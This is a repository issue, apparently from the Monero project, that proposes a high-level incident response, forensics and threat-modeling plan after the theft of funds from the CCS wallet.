meta icon indicating copy to clipboard operation
meta copied to clipboard

Published 20 hours ago verified publisher icon monero-project

CCS Wallet Incident Response. Forensics and Attribution

Open Monero-HackerIndustrial opened this issue 1 year ago • 10 comments

Per incident: CCS Wallet Incident

After the disclosure of the stolen funds there has been a lot of questions of what exactly happened and how an attacker could have gotten access to the funds. I am creating this issue so we can gather the evidence/logs needed to properly investigate the incident and hopefully get some attribution for the attack.

Incident Response Plan

Preparation

  • Timeline creation (Including actions that could potentially be related to incident)
  • Inventory of known devices affected
  • Create Image of affected devices for forensics.
    • Create full disk image using DD.
    • Dump active memory
  • Inventory of events from users

Forensics

Static Analysis
  • Identify IOCs (Indicators of compromise) in the following
    • Access logs
    • Backdoored accounts / auth keys
    • Binaries/scripts
  • Identify persistence
  • Memory dump analysis (TBA)
Dynamic Analysis (TBA)
  • Identify network traffic from host to potential c2 infra

Identify known groups

There are some known groups who target players in the crypto space. Those actors reuse a lot of TTPs. Identifying the lists of known actors can help give us a starting place for easy IOCs. This is just basic homework and don't expect it to be our main path forward.

Containment and clean up

If an attacker has persistent access on a machine then we need to contain and eradicate their access. Cleanup can be as simple as removing scheduled tasks to full OS reinstall (which is usually recommended in case anything was missed).

Other cleanup such as rotating keys, passwords and overall account hardening. (Malware can steal cookies and saved passwords from browsers). This means adding mfa and hardware keys when applicable.

Post Mortem and lessons learned

Any findings are used to complete the description of the attack killchain and provide any context missing from the timeline. Any identified threats can then be used to give recommendations for improving the security posture of devs in the future. This is not a time to place blame but a time to learn and improve.

Threat modeling

Monero devs are operating in hostile environment full of bad actors looking to steal funds or potentially target the code base. I can help create processes to mitigate those threats and those processes can be translated to easy to use workbooks for developers to use.

Monero-HackerIndustrial avatar Nov 08 '23 05:11 Monero-HackerIndustrial